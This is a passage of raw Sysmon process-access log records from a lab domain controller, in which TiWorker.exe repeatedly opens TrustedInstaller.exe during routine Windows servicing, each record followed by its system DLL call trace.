b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.742{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.742{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.726{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.695{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.695{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.695{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 